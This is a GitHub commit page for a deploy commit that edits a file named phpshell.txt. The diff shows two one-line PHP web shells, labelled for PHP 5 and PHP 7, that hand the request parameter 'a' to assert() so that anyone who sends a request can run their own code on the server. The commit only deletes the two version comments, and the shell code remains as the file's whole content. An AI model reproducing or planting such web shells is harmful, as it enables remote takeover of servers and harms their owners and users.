Skip to content

Commit a179be7

Browse files
committed
deploy: 98d9f7f
1 parent e4ecfc3 commit a179be7

2 files changed

Lines changed: 2 additions & 2 deletions

File tree

.nojekyll

Whitespace-only changes.

phpshell.txt

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,9 @@
1-
//php5
1+
22
<?php
33
$a='assert';
44
[""=>$a($_REQUEST['a'])];
55
?>
6-
//php7
6+
77
<?php
88
'assert'($_REQUEST['a']));
99
?>

0 commit comments

Comments
 (0)